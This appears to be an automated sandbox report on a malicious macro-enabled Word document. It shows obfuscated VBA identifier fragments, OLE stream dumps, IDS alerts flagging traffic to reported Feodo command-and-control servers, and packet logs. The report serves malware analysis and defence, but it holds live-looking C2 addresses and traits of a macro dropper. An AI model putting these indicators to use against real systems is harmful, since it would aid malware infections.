                                                                                  ylZdW
                                                                                  odRwCEQ.Range.Text
                                                                                  "xxxx"
                                                                                  ilYrjJGAJ
                                                                                  Left(ZTFizFGF.Range.ParagraphStyle,
                                                                                  DnLpUBDr
                                                                                  oEgsJiJ
                                                                                  yZgdJvVP.Range.ParagraphStyle
                                                                                  InStr(tMzYO.Range.Text,
                                                                                  PKZwD
                                                                                  HWQvGoFE)
                                                                                  Mid(Application.Name,
                                                                                  HWQvGoFE:
                                                                                  InStr(tbKDM.Range.Text,
                                                                                  Left(tbKDM.Range.ParagraphStyle,
                                                                                  GJznGAzC
                                                                                  lgLREAA
                                                                                  BMbIJGHTD
                                                                                  zFFKL
                                                                                  XICZyC
                                                                                  InStr(KKHJBcAYE.Range.Text,
                                                                                  pcgpnTx
                                                                                  InStr(ERcyoJoAE.Range.Text,
                                                                                  fIRXnM
                                                                                  InStr(bqQxcLA.Range.Text,
                                                                                  InStr(zKaCwWFDJ.Range.Text,
                                                                                  NZgEl)
                                                                                  Left(pQjOMaHL.Range.ParagraphStyle,
                                                                                  Paragraph
                                                                                  NZgEl:
                                                                                  UsEUVHGv
                                                                                  aTXZWf.Range.ParagraphStyle
                                                                                  jvPhFGkeE:
                                                                                  SAPOJDZpI
                                                                                  jvPhFGkeE)
                                                                                  yziTEHql
                                                                                  stfuHfQc
                                                                                  bqQxcLA
                                                                                  lUqNfMjAH)
                                                                                  tlCMF.Range.ParagraphStyle
                                                                                  ahinsg
                                                                                  lUqNfMjAH:
                                                                                  njcretF
                                                                                  GzKUJ
                                                                                  HHcTAXdJD
                                                                                  UdnxDGCD)
                                                                                  ahmsg
                                                                                  Left(aTXZWf.Range.ParagraphStyle,
                                                                                  UdnxDGCD:
                                                                                  InStr(oZBJQq.Range.Text,
                                                                                  ifuqBj
                                                                                  RHzVDJuIO
                                                                                  GcHmC
                                                                                  TOeEHSG
                                                                                  yKsempluE
                                                                                  rsJLI.Range.ListFormat.ListString
                                                                                  rQSGXCCJm
                                                                                  Left(ERcyoJoAE.Range.ParagraphStyle,
                                                                                  ahssg
                                                                                  tbKDM.Range.Text
                                                                                  KKHJBcAYE.Range.ListFormat.ListString
                                                                                  xZClD
                                                                                  dNESDo
                                                                                  tyXuGC
                                                                                  ngJGWB
                                                                                  JakAh
                                                                                  GjurWEEJF
                                                                                  ZFLxDGb
                                                                                  InStr(SymDGBcJj.Range.Text,
                                                                                  PKQbOAp:
                                                                                  AcZWjDIqE
                                                                                  PKQbOAp)
                                                                                  InStr(odRwCEQ.Range.Text,
                                                                                  xDmOKFAr
                                                                                  aTXZWf.Range.Text
                                                                                  ETZuAF
                                                                                  ERcyoJoAE
                                                                                  qdSxpB
                                                                                  rnlgIs
                                                                                  jvPhFGkeE
                                                                                  SymDGBcJj.Range.Text
                                                                                  UdnxDGCD
                                                                                  LMWQBR
                                                                                  "kkiew")
                                                                                  pQjOMaHL
                                                                                  zKaCwWFDJ.Range.ListFormat.ListString
                                                                                  aTXZWf
                                                                                  ElseIf
                                                                                  "sjgwb",
                                                                                  bqQxcLA.Range.ListFormat.ListString
                                                                                  Left(AhDZB.Range.ParagraphStyle,
                                                                                  Left(KKHJBcAYE.Range.ParagraphStyle,
                                                                                  HDpxEFk
                                                                                  efUjA)
                                                                                  XJSiBs
                                                                                  bWlCEGQ
                                                                                  PKQbOAp
                                                                                  adZlYEtAI
                                                                                  tgjhdsf
                                                                                  efUjA:
                                                                                  pQjOMaHL.Range.ParagraphStyle
                                                                                  zKaCwWFDJ
                                                                                  IFzjGXkh
                                                                                  Left(dNESDo.Range.ParagraphStyle,
                                                                                  acBgFwZ
                                                                                  ZTFizFGF
                                                                                  gemtRJp)
                                                                                  gemtRJp:
                                                                                  Left(tMzYO.Range.ParagraphStyle,
                                                                                  REKxGJ
                                                                                  Vqihh
                                                                                  JNfkj.Range.Text
                                                                                  oehBfBH:
                                                                                  pQjOMaHL.Range.Text
                                                                                  odRwCEQ.Range.ListFormat.ListString
                                                                                  Left(odRwCEQ.Range.ParagraphStyle,
                                                                                  oehBfBH)
                                                                                  UxOde
                                                                                  rsJLI
                                                                                  VqxJYDBE
                                                                                  Left(tlCMF.Range.ParagraphStyle,
                                                                                  InStr(pQjOMaHL.Range.Text,
                                                                                  kmGnE
                                                                                  yZgdJvVP.Range.ListFormat.ListString
                                                                                  Left(oZBJQq.Range.ParagraphStyle,
                                                                                  efUjA
                                                                                  odRwCEQ
                                                                                  NbelBt
                                                                                  XTsuJJ
                                                                                  ETZuAF:
                                                                                  ahcesg
                                                                                  ahrosg
                                                                                  DhTOiFICG
                                                                                  SymDGBcJj.Range.ParagraphStyle
                                                                                  ETZuAF)
                                                                                  KKHJBcAYE.Range.ParagraphStyle
                                                                                  qIplW:
                                                                                  lLMpOYHGF
                                                                                  tMzYO
                                                                                  JXMIDL
                                                                                  qIplW)
                                                                                  MkjIIE
                                                                                  TuPkG
                                                                                  tbKDM.Range.ParagraphStyle
                                                                                  SymDGBcJj.Range.ListFormat.ListString
                                                                                  InStr(dNESDo.Range.Text,
                                                                                  KKHJBcAYE.Range.Text
                                                                                  zjUfD
                                                                                  HWQvGoFE
                                                                                  tbKDM
                                                                                  ZiVzJG
                                                                                  pQjOMaHL.Range.ListFormat.ListString
                                                                                  ERcyoJoAE.Range.ListFormat.ListString
                                                                                  ADSJm
                                                                                  InStr(ZTFizFGF.Range.Text,
                                                                                  dycxOGB
                                                                                  wEEdNs
                                                                                  ahtsg
                                                                                  aTXZWf.Range.ListFormat.ListString
                                                                                  Error
                                                                                  InStr(vwBGxB.Range.Text,
                                                                                  dNESDo.Range.ListFormat.ListString
                                                                                  Attribute
                                                                                  yZgdJvVP.Range.Text
                                                                                  bqQxcLA.Range.ParagraphStyle
                                                                                  xYdYH
                                                                                  zQQpBQ
                                                                                  tHQgbISng
                                                                                  BGEICNVJF
                                                                                  Function
                                                                                  yUycfwFQH
                                                                                  ZTFizFGF.Range.ParagraphStyle
                                                                                  bJqZvJ
                                                                                  tMzYO.Range.ParagraphStyle
                                                                                  iRLMFIi
                                                                                  PEsXNwb
                                                                                  gJXnJN
                                                                                  gPbBFsGHn
                                                                                  vClZy
                                                                                  VoTfINbT:
                                                                                  BGsYGjXjA
                                                                                  UxOde:
                                                                                  VoTfINbT)
                                                                                  UxOde)
                                                                                  VBA Code

                                                                                  Streams

                                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                                  General
                                                                                  Stream Path:\x1CompObj
                                                                                  File Type:data
                                                                                  Stream Size:146
                                                                                  Entropy:4.00187355764
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                  General
                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:4096
                                                                                  Entropy:0.280929556603
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 628
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:628
                                                                                  Entropy:7.69070851529
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . h . . . . . " . . . ' . . . . . . 9 . . 3 . K / v ; g ( . . m & l F . . . x . . ; G ] X . Y . . . , . . . . . . . R . . t . . m F . ~ . . . ? . < V . . U . a . . . . . | . . \\ . Y | L n Y . A I . . . . w . . . y n . - . _ . . . . . x m . . . " . D I . / . A . . e . . A . . . . . S n . . . . [ . . Z . . . . . . . . . . I . p . . . . ] . . . . . . 0 r . . J g . . . . . . f R . . . . . . . . . . . . ) . . . I . . . ^ y . . . 0 b . { . . 9 . f . # . 2 . . 3 h u Q . I = . . . . . U . - . h ] . H . K t .
                                                                                  Data Raw:e7 2e bf 68 d8 81 81 de dc 22 bc 01 b3 27 ea ee ac cf de 16 39 e0 1d 33 b3 4b 2f 76 3b 67 28 bd 93 6d 26 6c 46 0e 09 9e 78 fc 8a 3b 47 5d 58 cd 59 1f ad a7 2c 16 ab 07 10 8c b5 8d 52 0a a2 74 f9 fe 6d 46 00 7e a8 9d c6 3f 9d 3c 56 e2 eb 55 f3 61 1d 1b ba 81 91 7c c2 1f 5c b9 59 7c 4c 6e 59 15 41 49 f0 12 cd db 77 0f e1 ec 79 6e b1 2d a1 5f 99 f0 ed 87 ba 78 6d f1 83 e0 22 ee 44 49
                                                                                  Stream Path: 1Table, File Type: data, Stream Size: 6873
                                                                                  General
                                                                                  Stream Path:1Table
                                                                                  File Type:data
                                                                                  Stream Size:6873
                                                                                  Entropy:6.02349782156
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                  Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                  Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 489
                                                                                  General
                                                                                  Stream Path:Macros/PROJECT
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Stream Size:489
                                                                                  Entropy:5.52305589739
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:I D = " { 8 4 3 3 C 4 A 2 - A 4 3 7 - 4 2 B E - A 6 1 F - 1 9 3 B 7 6 5 4 4 1 7 8 } " . . D o c u m e n t = G c i _ 5 6 o 4 5 g w / & H 0 0 0 0 0 0 0 0 . . M o d u l e = I _ j t o t l 9 q z r . . M o d u l e = T u e m 7 y _ 4 c v a p . . E x e N a m e 3 2 = " Y 0 w k f q 6 7 x n _ " . . N a m e = " Q w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 5 4 7 E E 6 1 1 2 F 0 1 6 F 0 1 6 F 0 1 6 F 0 1 6 " . . D P B = " D 8 D A 7 3 8 4 7 4
                                                                                  Data Raw:49 44 3d 22 7b 38 34 33 33 43 34 41 32 2d 41 34 33 37 2d 34 32 42 45 2d 41 36 31 46 2d 31 39 33 42 37 36 35 34 34 31 37 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 47 63 69 5f 35 36 6f 34 35 67 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 49 5f 6a 74 6f 74 6c 39 71 7a 72 0d 0a 4d 6f 64 75 6c 65 3d 54 75 65 6d 37 79 5f 34 63 76 61 70 0d 0a 45 78 65 4e 61 6d 65 33 32
                                                                                  Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 113
                                                                                  General
                                                                                  Stream Path:Macros/PROJECTwm
                                                                                  File Type:data
                                                                                  Stream Size:113
                                                                                  Entropy:3.77023945499
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:G c i _ 5 6 o 4 5 g w . G . c . i . _ . 5 . 6 . o . 4 . 5 . g . w . . . I _ j t o t l 9 q z r . I . _ . j . t . o . t . l . 9 . q . z . r . . . T u e m 7 y _ 4 c v a p . T . u . e . m . 7 . y . _ . 4 . c . v . a . p . . . . .
                                                                                  Data Raw:47 63 69 5f 35 36 6f 34 35 67 77 00 47 00 63 00 69 00 5f 00 35 00 36 00 6f 00 34 00 35 00 67 00 77 00 00 00 49 5f 6a 74 6f 74 6c 39 71 7a 72 00 49 00 5f 00 6a 00 74 00 6f 00 74 00 6c 00 39 00 71 00 7a 00 72 00 00 00 54 75 65 6d 37 79 5f 34 63 76 61 70 00 54 00 75 00 65 00 6d 00 37 00 79 00 5f 00 34 00 63 00 76 00 61 00 70 00 00 00 00 00
                                                                                  Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5460
                                                                                  General
                                                                                  Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                  File Type:data
                                                                                  Stream Size:5460
                                                                                  Entropy:5.56497361564
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                                  Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                                  Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 636
                                                                                  General
                                                                                  Stream Path:Macros/VBA/dir
                                                                                  File Type:data
                                                                                  Stream Size:636
                                                                                  Entropy:6.40609333405
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. x . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . Q 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                                                                  Data Raw:01 78 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 51 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 dd e4 f7 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                                  Stream Path: WordDocument, File Type: data, Stream Size: 112766
                                                                                  General
                                                                                  Stream Path:WordDocument
                                                                                  File Type:data
                                                                                  Stream Size:112766
                                                                                  Entropy:7.34858630918
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . . R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 b5 5a 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e b8 01 00 62 7f 00 00 62 7f 00 00 b5 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  01/27/21-20:58:42.378907TCP1201ATTACK-RESPONSES 403 Forbidden804916770.32.23.58192.168.2.22
                                                                                  01/27/21-20:59:29.562452TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 234917980192.168.2.2284.232.229.24
                                                                                  01/27/21-20:59:35.214781TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 18491808080192.168.2.2251.255.203.164
                                                                                  01/27/21-21:00:24.234592TCP2404328ET CNC Feodo Tracker Reported CnC Server TCP group 15491828080192.168.2.22217.160.169.110

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 27, 2021 20:58:42.077003956 CET4916780192.168.2.2270.32.23.58
                                                                                  Jan 27, 2021 20:58:42.226524115 CET804916770.32.23.58192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.226600885 CET4916780192.168.2.2270.32.23.58
                                                                                  Jan 27, 2021 20:58:42.228451967 CET4916780192.168.2.2270.32.23.58
                                                                                  Jan 27, 2021 20:58:42.377895117 CET804916770.32.23.58192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.378906965 CET804916770.32.23.58192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.462366104 CET4916880192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.502701998 CET8049168192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.502768040 CET4916880192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.502902985 CET4916880192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.543035984 CET8049168192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.543231964 CET8049168192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.589772940 CET4916780192.168.2.2270.32.23.58
                                                                                  Jan 27, 2021 20:58:42.605015993 CET49169443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.641979933 CET804916770.32.23.58192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.642051935 CET4916780192.168.2.2270.32.23.58
                                                                                  Jan 27, 2021 20:58:42.647254944 CET44349169192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.647427082 CET49169443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.661343098 CET49169443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.703768015 CET44349169192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.703804016 CET44349169192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.703830957 CET44349169192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.703912020 CET49169443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.715218067 CET49169443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.716254950 CET49170443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.745810032 CET4916880192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.755500078 CET44349169192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.759248018 CET44349170192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.759393930 CET49170443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.759818077 CET49170443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.783210993 CET8049168192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.783308983 CET4916880192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.802840948 CET44349170192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.802875996 CET44349170192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.802895069 CET44349170192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.803061962 CET49170443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.806488991 CET49170443192.168.2.22192.124.249.8
                                                                                  Jan 27, 2021 20:58:42.849574089 CET44349170192.124.249.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:43.092900038 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:43.346961021 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:43.347052097 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:43.347441912 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:43.600364923 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:43.600764036 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:43.601726055 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:43.601773024 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:43.601846933 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:43.601965904 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:43.617291927 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:43.872559071 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:44.087470055 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:45.553088903 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:45.808173895 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:45.809503078 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:45.989830971 CET49174443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.062351942 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.062398911 CET44349171177.12.170.95192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.062411070 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:46.062463045 CET49171443192.168.2.22177.12.170.95
                                                                                  Jan 27, 2021 20:58:46.141336918 CET4434917435.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.141505003 CET49174443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.142044067 CET49174443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.297775984 CET4434917435.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.297797918 CET4434917435.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.298012972 CET4434917435.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.298084021 CET49174443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.301193953 CET49174443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.302165031 CET49175443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.452596903 CET4434917435.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.453115940 CET4434917535.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.453229904 CET49175443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.453780890 CET49175443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.605424881 CET4434917535.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.605674982 CET4434917535.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.605704069 CET4434917535.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.605827093 CET49175443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.608263969 CET49175443192.168.2.2235.209.96.32
                                                                                  Jan 27, 2021 20:58:46.761357069 CET4434917535.209.96.32192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.893404007 CET49176443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.046842098 CET4434917635.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.047045946 CET49176443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.047696114 CET49176443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.198832035 CET4434917635.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.199065924 CET4434917635.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.199089050 CET4434917635.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.199196100 CET49176443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.202311993 CET49176443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.203166008 CET49177443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.353646994 CET4434917635.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.354945898 CET4434917735.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.355106115 CET49177443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.355572939 CET49177443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.507386923 CET4434917735.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.507812977 CET4434917735.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.507826090 CET4434917735.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.507961035 CET49177443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.511387110 CET49177443192.168.2.2235.209.174.246
                                                                                  Jan 27, 2021 20:58:47.584994078 CET49178443192.168.2.2235.163.191.195
                                                                                  Jan 27, 2021 20:58:47.665076017 CET4434917735.209.174.246192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.820334911 CET4434917835.163.191.195192.168.2.22

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 27, 2021 20:58:41.851636887 CET5219753192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:42.058736086 CET53521978.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.403414965 CET5309953192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:42.461323023 CET53530998.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.547595978 CET5283853192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:42.604012966 CET53528388.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:42.828968048 CET6120053192.168.2.228.8.8.8
